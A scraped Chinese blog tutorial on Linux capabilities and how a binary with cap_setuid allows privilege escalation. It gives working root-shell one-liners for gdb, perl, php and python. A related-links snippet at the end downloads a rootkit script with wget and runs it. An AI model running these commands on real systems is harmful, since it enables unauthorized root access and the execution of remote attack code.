shell获取capabilities_Linux提权(capabilities)

最新推荐文章于 2023-02-07 19:02:13 发布
最新推荐文章于 2023-02-07 19:02:13 发布
阅读量339 收藏
点赞数
文章标签: shell获取capabilities
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32905035/article/details/112819373
版权
Linux的Capabilities机制将root权限细分为多个功能组,允许按需授予普通用户特定权限,降低系统风险。本文介绍了Capabilities的基础知识,包括如何查询、设置和删除,以及在提权场景中的应用实例,例如通过setuid进行权限提升。
摘要由CSDN通过智能技术生成

0x00 Capabilities入门

什么是Capabilities

Linux的Root用户拥有最高的权限,可以对几乎系统中的任何文件进行操作。然而普通用户如何操作一些高权限的文件?

在Linux中存在两种方法:

第一种是在执行的命令前加上sudo,这样就会以Root的身份进行操作。

第二种方法是设置SUID或SGID,这样虽然会以原用户的身份进行操作,但是获得了操作权限。

SUID和SGID存在安全隐患,因为某文件设置了之后普通用户将会获得广范围的操作权限。

为了避免这种安全隐患,Linux内核 2.2 之后引入了Capabilities机制。什么是Capabilities机制哪?

原理很简单,就是将之前与超级用户 root(UID=0)关联的特权细分为不同的功能组,Capabilites 作为线程(Linux 并不真正区分进程和线程)的属性存在,每个功能组都可以独立启用和禁用。其本质上就是将内核调用分门别类,具有相似功能的内核调用被分到同一组中。

这样一来,权限检查的过程就变成了:在执行特权操作时,如果线程的有效身份不是 root,就去检查其是否具有该特权操作所对应的 capabilities,并以此为依据,决定是否可以执行特权操作。

细分后的特权:

capability名称

描述

CAPAUDITCONTROL

启用和禁用内核审计;改变审计过滤规则;检索审计状态和过滤规则

CAPAUDITREAD

允许通过 multicast netlink 套接字读取审计日志

CAPAUDITWRITE

将记录写入内核审计日志

CAPBLOCKSUSPEND

使用可以阻止系统挂起的特性

CAP_CHOWN

修改文件所有者的权限

CAPDACOVERRIDE

忽略文件的 DAC 访问限制

CAPDACREAD_SEARCH

忽略文件读及目录搜索的 DAC 访问限制

CAP_FOWNER

忽略文件属主 ID 必须和进程用户 ID 相匹配的限制

CAP_FSETID

允许设置文件的 setuid 位

CAPIPCLOCK

允许锁定共享内存片段

CAPIPCOWNER

忽略 IPC 所有权检查

CAP_KILL

允许对不属于自己的进程发送信号

CAP_LEASE

允许修改文件锁的 FL_LEASE 标志

CAPLINUXIMMUTABLE

允许修改文件的 IMMUTABLE 和 APPEND 属性标志

CAPMACADMIN

允许 MAC 配置或状态更改

CAPMACOVERRIDE

忽略文件的 DAC 访问限制

CAP_MKNOD

允许使用 mknod() 系统调用

CAPNETADMIN

允许执行网络管理任务

CAPNETBIND_SERVICE

允许绑定到小于 1024 的端口

CAPNETBROADCAST

允许网络广播和多播访问

CAPNETRAW

允许使用原始套接字

CAP_SETGID

允许改变进程的 GID

CAP_SETFCAP

允许为文件设置任意的 capabilities

CAP_SETPCAP

参考 capabilities man page

CAP_SETUID

允许改变进程的 UID

CAPSYSADMIN

允许执行系统管理任务,如加载或卸载文件系统、设置磁盘配额等

CAPSYSBOOT

允许重新启动系统

CAPSYSCHROOT

允许使用 chroot() 系统调用

CAPSYSMODULE

允许插入和删除内核模块

CAPSYSNICE

允许提升优先级及设置其他进程的优先级

CAPSYSPACCT

允许执行进程的 BSD 式审计

CAPSYSPTRACE

允许跟踪任何进程

CAPSYSRAWIO

允许直接访问 /devport、/dev/mem、/dev/kmem 及原始块设备

CAPSYSRESOURCE

忽略资源限制

CAPSYSTIME

允许改变系统时钟

CAPSYSTTY_CONFIG

允许配置 TTY 设备

CAP_SYSLOG

允许使用 syslog() 系统调用

CAPWAKEALARM

允许触发一些能唤醒系统的东西(比如 CLOCKBOOTTIMEALARM 计时器)

Capabilities使用

查询

getcap [路径]

## 查询全部

getcap -r / 2>/dev/null # -r 递归查询 2>/dev/null 错误信息从定向到null

设置

## 多个Capabilities以分号划分

setcap [Capabilities名称]=eip [路径]

## 设置多个案例

setcap cap_setgid,cap_setuid=eip /usr/bin/python

## 注意

设置时路径要指定源文件,不可以是链接文件,如果报错可以查看是不是路径指定的为链接文件

删除

setcap -r [路径]

0x01 提权实例

setuid

通过setuid可以将进程执行用户设置为root,以达到获取root权限效果

gdb

gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit

## -ex 执行命令

## gdb调用python debug调试;在shell中启动python的命令为python2,在gdb中也为python

## -nx 不初始化脚本

perl

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

php

php -r "posix_setuid(0); system('/bin/sh');"

出现如下时

需要安装php-posix

yum install php-posix

## centos中命令

python

python -c 'import os; os.setuid(0); os.system("/bin/sh")'

参考

平骧
关注
利用capabilities提权(setuid、cap_setuid)
墨痕诉清风的博客
08-21 1740
从而,在实际进行特权操作时,如果euid不是root,便会检查是否具有该特权操作所对应的capabilities,并以此为依据,决定是否可以执行特权操作。我们运行SUID的命令时,通常只是需要使用一小部分特权,但是使用SUID,却可以拥有root用户的全部权限。当然,Permitted集合默认是不能增加新的capabilities的,除非CAP_SETPCAP在Effective集合中。每一个线程,具有3个capabilities的集合,每个集合中,可以包含零个或多个capabilities。...
lshw linux_Linux lshw命令–获取Linux硬件信息
从零开始的教程世界
07-10 1571
lshw linuxLinux lshw command lists all the hardware configuration of the system. Linux lshw命令列出了系统的所有硬件配置。 Some of the common information we can extract from the lshw command are: 我们可以从lshw命令提取的一些常见信...
Capabilities提权
m0_57221101的博客
04-02 1598
linux2.2之后,产生了Capabilities用于分隔root权限,以便于用户更好,更安全,更精细的管理机器的功能和权限。 具体的相关与capabilities的使用方面知识可以去参考这篇文章Linux Capabilities 简介 - sparkdev - 博客园 (cnblogs.com) 这里仅讨论对提权有帮助的CAP_SETUID标志 操作 首先需要探查有CAP_SETUID标志的进程 /usr/sbin/getcap -r / 2>/dev/null 这样来找到进程
php linux 提权,Linux 提权 —— SUID提权
weixin_33561009的博客
03-09 947
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。已知的可用来提权linux可行性的文件列表如下:• nmap • vim • find • bash • more • less • nano • cp以下命令可以发现系统上运行的所有SUID可执行文件。1. #以下命令...
linux系统利用可执行文件的Capabilities实现权限提升
whatday的专栏
10-25 2859
一、操作目的和应用场景 Capabilities机制是在Linux内核2.2之后引入的,原理很简单,就是将之前与超级用户root(UID=0)关联的特权细分为不同的功能组,Capabilites作为线程(Linux并不真正区分进程和线程)的属性存在,每个功能组都可以独立启用和禁用。其本质上就是将内核调用分门别类,具有相似功能的内核调用被分到同一组中。 这样一来,权限检查的过程就变成了:在执行特权操作时,如果线程的有效身份不是root,就去检查其是否具有该特权操作所对应的capabilities,并以此为
php 提权脚本 linux,linux 自动提权perl脚本
weixin_39518840的博客
04-02 550
使用demoyaseng@UAUC:~$ wget http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt -O root.plyaseng@UAUC:~$ perl root.plyaseng@UAUC#:help----------------------------------------------------...
Linux提权全剧终
Ms08067安全实验室
03-11 1182
喜欢就关注我吧,订阅更多最新安全知识文章来源|MS08067 内网安全知识星球本文作者:非正常接触(Ms08067内网安全小组成员)内网纵横四海 认准Ms08067这里介绍一些Linux...
Linux 提权的简单总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-30 889
什么是权限 在Linux 系统中,ls -al即可查看列出文件所属的权限。这里我用kali 系统来演示。 …… drwxr-xr-x 2 kali kali 4096 Jan 27 12:52 Downloads -rw-r--r-- 1 root root 903 Jun 14 11:33 exp.html -rw-r--r-- 1 root root 153600 May 5 09:42 flag lrwxrwxrwx 1 kali kali 28 May 1.
Capadlities提权
weixin_51151193的博客
12-29 596
Capadlities提权操作
linux php木马提权,linux本地内核提权漏洞介绍
weixin_28917223的博客
03-11 224
2019年07月20日,Linux正式修复了一个本地内核提权漏洞。通过此漏洞,攻击者可将普通权限用户提升为Root权限。漏洞描述当调用PTRACE_TRACEME时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数。但是,对象struct cred的生存周期规则不允许无条件地将RCU引用转换为稳定引用。PTRACE_TRACEME获取父进程的凭证,使其...
Linux下WEBSHELL提权一技
06-15
Linux下WEBSHELL提权一技 用phpshell2.0和配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。
php用户提权root,LINUX普通用户提权为ROOT
weixin_32925455的博客
03-20 143
1.在LINUX目录下建立test 帐户2.下载 a脚本 在http://milw0rm.com/exploits/84783.查看UDEV的PID 方法一: 先cat /proc/net/netlinkffff810077587400 15 364 ffffffff 0 0 0000000000000000 2ffff810037f81000 16 0...
linux php木马提权,Centos7 下 redis 入侵实战 - root提权
weixin_29471541的博客
03-23 356
.知识铺垫Redis 还有几个奇怪的功能:Linux 有一个功能可以通过一个端口写到本地文件,如果我要写一个文件,而这个文件是木马,那就自动拉起了。如果写入自己签名的公钥,用自己的私钥解公钥,自己解自己的,所以直接替换公钥,就是通过 Redis。那么下面来实战演练一下通过redis匿名登陆写入反弹shell .环境准备首先启动一个允许匿名登陆的redis服务器。1[root@server01...
php system函数提权,linux提权之mysql的root权限通过system函数提权
weixin_33260484的博客
03-28 242
linux提权之mysql的root权限通过system函数提权linux系统环境下,mysql以root权限 登录时提权mysql5.x 的linux版本下面有一个函数,可以帮助我们干很多猥琐的事情,这个函数4。x下面貌似没有,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的 明天再看看函数手册,再装一个实验一下。mysql 5.x里面引入了一个system函数,这个函...
php用户提权root,LINUX 普通用户提权ROOT (完整版) 转
weixin_39970689的博客
03-20 659
1. 在LINUX目录下建立test 帐户2.下载 a脚本 在3.查看UDEV的PID方法一: 先cat /proc/net/netlinkffff810077587400 15364 ffffffff 0 0 0000000000000000 2ffff810037f81000 160 00000000 0 0 ...
Linux提权
weixin_44489066的博客
01-29 3410
系统漏洞提权总体思路:1、获取操作系统版本号;2、根据版本号搜索exp;3、反弹shell利用;4、尝试利用 1、获取系统版本号 获取发行版本 cat /etc/issue (Debian,ubuntu系列) cat /etc/*-release cat /etc/lsb-release cat /etc/redhat-release (红帽,centos系列) 获取内核版本 ca...
linux php 执行命令权限不够,PHP调用Linux命令权限不足问题解决方法
weixin_30140093的博客
03-10 1960
PHP调用Linux命令权限不足问题解决方法业务背景: yourcmd为我的linux程序,它对权限要求非常严格,当用php去执行yourcmd程序系统:CentOS 6.3apache是php的执行用户用exec函数去执行linux系统上的程序/usr/local/yourcmd/sbin/yourcmdphp代码如下:复制代码 代码如下:$conf_file = "/var/www/html...
Linux权限提升
Williamanddog的博客
02-07 1466
SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的 权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。 CVE-2016-5195,即 Dirty COW,俗称「脏牛」漏洞。它是 Linux Kernel 中的条件竞争漏 洞,攻击者可以利用 Linux kernel 中的 COW(Copy-on-Write)技术中存在的逻辑漏洞完成对文件的 越权读写,恶意用户可利用此漏洞来获取高权限。
php服务器提权,服务器提权
weixin_27945229的博客
03-13 495
当拿到WebShell 之后,下⼀步⼲什么?权限提升通过一些最初的漏洞利⽤途径,攻击者将获得⼀定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得⽐最初更多的权限,以期望从其他账户访问敏感信息,甚⾄获得对整个系统的完全管理控制。当攻击者以这种⽅式扩⼤其最初的未经授权访问的权限时,将其⾏为称为权限提升攻击。简单来说,就是获取⽐最初更多的权限,甚⾄系统权限。⽔平权限提升(越权)我们假设攻击者已经获得...
capabilities linux
最新发布
06-08
Linux 操作系统中,capabilities 是一种精细的权限管理机制,它允许应用程序仅获得所需的最小权限,而不是以 root 用户的身份运行整个应用程序。这种权限管理机制可以提高系统的安全性和可靠性。 在 Linux 中,capabilities 可以通过两种方式来实现:一种是使用 POSIX capabilities,另一种是使用 Linux capabilities。两种方法的具体实现略有不同,但都可以实现类似的权限管理功能。 使用 capabilities 可以将一些特权操作的权限分离开来,例如挂载文件系统、更改时间戳、执行系统调用等等。这样可以提高系统的安全性,避免应用程序在运行过程中误操作导致系统崩溃或数据丢失等问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值